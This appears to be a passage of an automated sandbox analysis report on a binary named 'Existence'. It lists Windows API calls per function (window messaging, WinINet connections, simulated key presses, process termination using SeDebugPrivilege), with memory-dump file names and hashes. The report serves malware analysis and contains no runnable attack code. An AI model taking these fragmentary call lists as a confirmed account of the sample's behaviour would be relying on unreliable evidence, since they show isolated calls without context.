                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C5CAB
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C5CB8
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007C5CEB
                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 007C5D25
                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 007C5D34
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3210457359-0
                                                                                                                                                                                          • Opcode ID: f3f8053a2a830dec0e44937aeb03370e9a2a6cfe0b99de2093effb55b5a5e949
                                                                                                                                                                                          • Instruction ID: 64f18fec579d0fbaa3712b5ff655b189b2acec62ec4d3f376592ff939dd43fac
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3f8053a2a830dec0e44937aeb03370e9a2a6cfe0b99de2093effb55b5a5e949
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1518A74A41B09AFEB349F24CC4DF993B61AB04760F14811EBA25AA1E1C77EB9C0DB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 007728D1
                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007728EA
                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007728FA
                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00772912
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00772933
                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00772942
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0077295F
                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007311F5,00000000,00000000,00000000,000000FF,00000000), ref: 0077296E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1268354404-0
                                                                                                                                                                                          • Opcode ID: 3264dde7dbb8819ca60946900df23190e1c8d92159bf3f0b0e54210b38bbd3f1
                                                                                                                                                                                          • Instruction ID: 734ecf4d6a857d4155e74212f9b119c5d534ba1ff58cd21e7a6e4cdffcad6c46
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3264dde7dbb8819ca60946900df23190e1c8d92159bf3f0b0e54210b38bbd3f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0517B30600209EFEB24DF25CC45FAA7BB5FB48750F108528FA56A72A2D778ED91DB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007ACBC7
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007ACBDA
                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 007ACBEE
                                                                                                                                                                                            • Part of subcall function 007ACC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007ACCB7
                                                                                                                                                                                            • Part of subcall function 007ACC98: GetLastError.KERNEL32 ref: 007ACD67
                                                                                                                                                                                            • Part of subcall function 007ACC98: SetEvent.KERNEL32(?), ref: 007ACD7B
                                                                                                                                                                                            • Part of subcall function 007ACC98: InternetCloseHandle.WININET(00000000), ref: 007ACD86
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                                          • Opcode ID: fffc50b60c2462a6b26e25f8f35cbe3cb377005215f02ade3e87db5c37dfb9ea
                                                                                                                                                                                          • Instruction ID: 00d25e0f69b81c00bb0f35961e570dbb69b6aa016d707849ccea1919670aa137
                                                                                                                                                                                          • Opcode Fuzzy Hash: fffc50b60c2462a6b26e25f8f35cbe3cb377005215f02ade3e87db5c37dfb9ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20317E71500705FFDB229F75CD48A6BBBF8FF85310B04862DF85A82610DB39E814AB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00794393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007943AD
                                                                                                                                                                                            • Part of subcall function 00794393: GetCurrentThreadId.KERNEL32 ref: 007943B4
                                                                                                                                                                                            • Part of subcall function 00794393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00792F00), ref: 007943BB
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00792F0A
                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00792F28
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00792F2C
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00792F36
                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00792F4E
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00792F52
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00792F5C
                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00792F70
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00792F74
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                                          • Opcode ID: d79523dd4ab48a2c03235fc4055a859464a86aa8aca9b20c556ce332a99cb0b5
                                                                                                                                                                                          • Instruction ID: b98a8d34f1333cb9eed6b45015d9628c316a75aaa62ca9f1ab23a4d44bdabac8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d79523dd4ab48a2c03235fc4055a859464a86aa8aca9b20c556ce332a99cb0b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25012430384214BBFB2027689C8EF593F5ADB4DB51F120029F318AE0E0C9E62801CAAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00791D95,?,?,00000000), ref: 00792159
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00791D95,?,?,00000000), ref: 00792160
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00791D95,?,?,00000000), ref: 00792175
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00791D95,?,?,00000000), ref: 0079217D
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00791D95,?,?,00000000), ref: 00792180
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00791D95,?,?,00000000), ref: 00792190
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00791D95,00000000,?,00791D95,?,?,00000000), ref: 00792198
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00791D95,?,?,00000000), ref: 0079219B
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,007921C1,00000000,00000000,00000000), ref: 007921B5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                                          • Opcode ID: 5a6db7b2fd009b88711084cc1679a01bfa4a61fd3e40080c87e06fa00691ff39
                                                                                                                                                                                          • Instruction ID: 03cbaee1a19f9bfc121bff9dc74c49654db203fed5bfdd9528b78070f68ce334
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6db7b2fd009b88711084cc1679a01bfa4a61fd3e40080c87e06fa00691ff39
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2001BBB5240348BFEB20AFA5DC4DF6B7BACEB88711F058425FA05DB1A1CA749C01CB24
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0079DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0079DDAC
                                                                                                                                                                                            • Part of subcall function 0079DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0079DDBA
                                                                                                                                                                                            • Part of subcall function 0079DD87: FindCloseChangeNotification.KERNEL32(00000000), ref: 0079DE87
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BABCA
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007BABDD
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BAC10
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007BACC5
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 007BACD0
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BAD21
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                          • API String ID: 1701285019-2896544425
                                                                                                                                                                                          • Opcode ID: 1b520732c31c810fb4e9cfb02b721ce7e45adf0ccc36e137544b45bfaaebdf03
                                                                                                                                                                                          • Instruction ID: ddfc1820f5a422b3cd0e85acda9f790c8aeac121c5663bee9d6bb9e71132abd3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b520732c31c810fb4e9cfb02b721ce7e45adf0ccc36e137544b45bfaaebdf03
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13619074204641EFD720EF18C499F65BBE1AF54308F58849CE4664BBA3C779EC45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C43C1
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007C43D6
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C43F0
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C4435
                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 007C4462
                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C4490
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                                                          • API String ID: 2147712094-78025650
                                                                                                                                                                                          • Opcode ID: 54898e90b602428d91ed514abb606ff149ec01cdbe6fc6a04cc5672a807a5744
                                                                                                                                                                                          • Instruction ID: 5d5857b977892e042fdddb63aaba87d6c06eb164bf11b68c96a00d14d156ebac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54898e90b602428d91ed514abb606ff149ec01cdbe6fc6a04cc5672a807a5744
                                                                                                                                                                                          • Instruction Fuzzy Hash: 79419D71A00319ABDF219F64CC49FEA7BA9FB48350F10012EF958E7291D7B99D80DB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079C6C4
                                                                                                                                                                                          • IsMenu.USER32(00000000), ref: 0079C6E4
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0079C71A
                                                                                                                                                                                          • GetMenuItemCount.USER32(01145390), ref: 0079C76B
                                                                                                                                                                                          • InsertMenuItemW.USER32(01145390,?,00000001,00000030), ref: 0079C793
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                          • String ID: 0$2
                                                                                                                                                                                          • API String ID: 93392585-3793063076
                                                                                                                                                                                          • Opcode ID: 043cf2278c5ce8998ed608025e489cdb7a35b21789f49e7e2747dd511716da47
                                                                                                                                                                                          • Instruction ID: c9eb5d0eeb00a57093d7c0a8ecc39984537c36be91422a07884b5b81bd3e3088
                                                                                                                                                                                          • Opcode Fuzzy Hash: 043cf2278c5ce8998ed608025e489cdb7a35b21789f49e7e2747dd511716da47
                                                                                                                                                                                          • Instruction Fuzzy Hash: BA51B570600205EBDF22CFB8E9C8BAEBBF4AF59314F24416AE91197291D3789D45CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 007319E1
                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 007319FE
                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00731A23
                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 00731A3D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                          • String ID: $'s$$'s
                                                                                                                                                                                          • API String ID: 4210589936-26749398
                                                                                                                                                                                          • Opcode ID: fc0ba20373b715970e92a17c0a008a766a6f2d3fb47eb1de93109fdcb148c152
                                                                                                                                                                                          • Instruction ID: 98709cee7d0db8f4d183002035bc8e63a07a351443454b73399afc64a4d85218
                                                                                                                                                                                          • Opcode Fuzzy Hash: fc0ba20373b715970e92a17c0a008a766a6f2d3fb47eb1de93109fdcb148c152
                                                                                                                                                                                          • Instruction Fuzzy Hash: D5418D71A0450AFFEF159FA4C844BEEB774FB05365F60C22AE429A2291C7386E50DB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0079D1BE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                                                          • Opcode ID: c94131edbafbfe85aeb147543dce55b92afc2e9bae2f887dfd72b1a5c8731dc4
                                                                                                                                                                                          • Instruction ID: 134cf3381b6fbec9c4ee574cb57b280c69388fd40ac4390d29b7555bfca3d4d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c94131edbafbfe85aeb147543dce55b92afc2e9bae2f887dfd72b1a5c8731dc4
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF11BB7739830EBBEB155B54FC82DAA77AC9F15765B21002AFA00A6281D7BC5E408174
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                                                          • API String ID: 642191829-3771769585
                                                                                                                                                                                          • Opcode ID: e64c173d36920458554579b1f62ca1b6911c4d42a1b35eb081e8d9cd27e39ac0
                                                                                                                                                                                          • Instruction ID: be5d6c14a947fad421788f8d101745d8f27435d3d9aeba94f143fa72736c23f6
                                                                                                                                                                                          • Opcode Fuzzy Hash: e64c173d36920458554579b1f62ca1b6911c4d42a1b35eb081e8d9cd27e39ac0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5111B471900119BBDF34A7B0EC4AEEE77ACDF41715F0000B9F905A6091EFBC9E858665
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 952045576-0
                                                                                                                                                                                          • Opcode ID: 0278507e3fb5e898ca5253cba400694ef973a1953b8f442d399d708361468c3e
                                                                                                                                                                                          • Instruction ID: a4791964ed8dd9107a32fa25a7cda952866889bdfa8440802cc7b4b651a4918b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0278507e3fb5e898ca5253cba400694ef973a1953b8f442d399d708361468c3e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E419565C11114B9CF21EBF8CC8AACFB768EF05311F908462E918E3121FA78D659C3A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 0074FC41
                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 0078FC15
                                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 0078FC98
                                                                                                                                                                                          Memory Dump Source
